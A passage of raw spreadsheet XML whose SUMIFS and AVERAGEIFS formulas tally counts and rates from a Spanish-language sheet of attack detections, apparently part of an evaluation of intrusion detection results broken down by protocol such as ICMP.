        <f>BT30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BU34" s="355">
        <f>BU30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BV34" s="355">
        <f>BV30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BW34" s="355">
        <f>BW30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BX34" s="355">
        <f>BX30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BY34" s="355">
        <f>BY30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>9</v>
      </c>
      <c r="BZ34" s="355">
        <f>BZ30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>123</v>
      </c>
      <c r="CA34" s="355">
        <f>CA30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CB34" s="355">
        <f>CB30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CC34" s="355">
        <f>CC30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CD34" s="355">
        <f>CD30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CE34" s="355">
        <f>CE30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CF34" s="355">
        <f>CF30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CG34" s="355">
        <f>CG30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CH34" s="355">
        <f>CH30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CI34" s="355">
        <f>CI30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CJ34" s="355">
        <f>CJ30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CK34" s="355">
        <f>CK30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CL34" s="355">
        <f>CL30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CM34" s="355">
        <f>CM30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="CN34" s="355">
        <f>CN30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CO34" s="355">
        <f>CO30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>6</v>
      </c>
      <c r="CP34" s="355">
        <f>CP30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="CQ34" s="355">
        <f>CQ30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CR34" s="355">
        <f>CR30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CS34" s="355">
        <f>CS30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CT34" s="355">
        <f>CT30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1002</v>
      </c>
      <c r="CU34" s="355">
        <f>CU30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CV34" s="355">
        <f>CV30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="CW34" s="355">
        <f>CW30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="CX34" s="355">
        <f>CX30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="CY34" s="355">
        <f>CY30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="CZ34" s="355">
        <f>CZ30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DA34" s="355">
        <f>DA30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DB34" s="355">
        <f>DB30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DC34" s="355">
        <f>DC30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DD34" s="355">
        <f>DD30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="DE34" s="355">
        <f>DE30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>5</v>
      </c>
      <c r="DF34" s="355">
        <f>DF30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="DG34" s="355">
        <f>DG30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DH34" s="355">
        <f>DH30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>450</v>
      </c>
      <c r="DI34" s="355">
        <f>DI30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="DJ34" s="356">
        <f>DJ30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>11</v>
      </c>
      <c r="DK34" s="271"/>
      <c r="DO34" s="357"/>
      <c r="DP34" s="358" t="s">
        <v>427</v>
      </c>
      <c r="DQ34" s="359">
        <v>0.0</v>
      </c>
      <c r="DR34" s="359">
        <v>0.0</v>
      </c>
      <c r="DS34" s="359">
        <v>0.0</v>
      </c>
      <c r="DT34" s="359">
        <v>0.0</v>
      </c>
      <c r="DU34" s="360">
        <v>2.0</v>
      </c>
      <c r="DV34" s="271"/>
      <c r="DW34" s="358" t="s">
        <v>427</v>
      </c>
      <c r="DX34" s="359">
        <v>0.0</v>
      </c>
      <c r="DY34" s="359">
        <v>0.0</v>
      </c>
      <c r="DZ34" s="359">
        <v>0.0</v>
      </c>
      <c r="EA34" s="359">
        <v>0.0</v>
      </c>
      <c r="EB34" s="360">
        <v>2.0</v>
      </c>
      <c r="EC34" s="271"/>
      <c r="ED34" s="280"/>
      <c r="EG34" s="279"/>
      <c r="EH34" s="271"/>
      <c r="EI34" s="358" t="s">
        <v>427</v>
      </c>
      <c r="EJ34" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI34,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S32 &amp; "*")</f>
        <v>2</v>
      </c>
      <c r="EK34" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI34,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI34 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="EL34" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI34,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI34 &amp; "*")</f>
        <v>10</v>
      </c>
      <c r="EM34" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI34,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI34 &amp; "*")</f>
        <v>27</v>
      </c>
      <c r="EN34" s="360">
        <f t="shared" si="4"/>
        <v>27</v>
      </c>
      <c r="EO34" s="364"/>
      <c r="EP34" s="364"/>
      <c r="EQ34" s="364"/>
      <c r="ER34" s="271"/>
      <c r="ES34" s="271"/>
      <c r="ET34" s="271"/>
      <c r="EU34" s="271"/>
      <c r="EV34" s="379" t="s">
        <v>427</v>
      </c>
      <c r="EW34" s="389">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="EX34" s="389">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="EY34" s="389">
        <f t="shared" si="10"/>
        <v>5</v>
      </c>
      <c r="EZ34" s="390">
        <f t="shared" si="11"/>
        <v>13.5</v>
      </c>
      <c r="FA34" s="367"/>
      <c r="FC34" s="334" t="s">
        <v>2452</v>
      </c>
      <c r="FD34" s="335" t="s">
        <v>2477</v>
      </c>
      <c r="FE34" s="336">
        <f t="shared" ref="FE34:FH34" si="15">K75</f>
        <v>0.04777768749</v>
      </c>
      <c r="FF34" s="336">
        <f t="shared" si="15"/>
        <v>0.09596164784</v>
      </c>
      <c r="FG34" s="336">
        <f t="shared" si="15"/>
        <v>0.107662306</v>
      </c>
      <c r="FH34" s="337">
        <f t="shared" si="15"/>
        <v>0.1090436337</v>
      </c>
      <c r="FK34" s="303" t="s">
        <v>209</v>
      </c>
      <c r="FL34" s="68">
        <f t="shared" ref="FL34:FL35" si="18">EJ36</f>
        <v>5</v>
      </c>
      <c r="FM34" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK34,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK34 &amp; "*")</f>
        <v>21</v>
      </c>
      <c r="FN34" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK34,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK34 &amp; "*")</f>
        <v>27</v>
      </c>
      <c r="FO34" s="304">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK34,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK34 &amp; "*")</f>
        <v>49</v>
      </c>
      <c r="FP34" s="305"/>
      <c r="FQ34" s="303" t="s">
        <v>209</v>
      </c>
      <c r="FR34" s="69">
        <f t="shared" ref="FR34:FU34" si="16">1-(FL34/EJ36)</f>
        <v>0</v>
      </c>
      <c r="FS34" s="69">
        <f t="shared" si="16"/>
        <v>0.04545454545</v>
      </c>
      <c r="FT34" s="69">
        <f t="shared" si="16"/>
        <v>0.2285714286</v>
      </c>
      <c r="FU34" s="306">
        <f t="shared" si="16"/>
        <v>0.4166666667</v>
      </c>
      <c r="GG34" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"ICMP")</f>
        <v>ICMP</v>
      </c>
      <c r="GH34" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG34)</f>
        <v>0</v>
      </c>
      <c r="GI34" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG34)</f>
        <v>0</v>
      </c>
      <c r="GJ34" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG34)</f>
        <v>0</v>
      </c>
      <c r="GK34" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"ICMP")</f>
        <v>ICMP</v>
      </c>
      <c r="GL34" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG34)</f>
        <v>0</v>
      </c>
      <c r="GM34" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG34)</f>
        <v>0</v>
      </c>
      <c r="GN34" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG34)</f>
        <v>0</v>
      </c>
      <c r="GO34" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"ICMP")</f>
        <v>ICMP</v>
      </c>
      <c r="GP34" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG34)</f>
        <v>0</v>
      </c>
      <c r="GQ34" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG34)</f>
        <v>0</v>
      </c>
      <c r="GR34" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG34)</f>
        <v>0</v>
      </c>
      <c r="GS34" s="409" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"ICMP")</f>
        <v>ICMP</v>
      </c>
      <c r="GT34" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG34)</f>
        <v>0</v>
      </c>
      <c r="GU34" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG34)</f>
        <v>0</v>
      </c>
      <c r="GV34" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG34)</f>
        <v>0</v>
      </c>
    </row>
    <row r="35">
      <c r="B35" s="277"/>
      <c r="C35" s="271"/>
      <c r="D35" s="271"/>
      <c r="E35" s="271"/>
      <c r="F35" s="271"/>
      <c r="G35" s="278"/>
      <c r="J35" s="277"/>
      <c r="K35" s="406"/>
      <c r="L35" s="407"/>
      <c r="M35" s="407"/>
      <c r="N35" s="408"/>
      <c r="O35" s="278"/>
      <c r="Q35" s="271"/>
      <c r="R35" s="352" t="s">
        <v>2476</v>
      </c>
      <c r="S35" s="353">
        <f>S31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>2066</v>
      </c>
      <c r="T35" s="353">
        <f>T31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>0</v>
      </c>
      <c r="U35" s="353">
        <f>U31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>126</v>
      </c>
      <c r="V35" s="353">
        <f>V31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>19</v>
      </c>
      <c r="W35" s="353">
        <f>V31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>19</v>
      </c>
      <c r="X35" s="353">
        <f>X31-( SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$R3:$R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>11</v>
      </c>
      <c r="Y35" s="353">
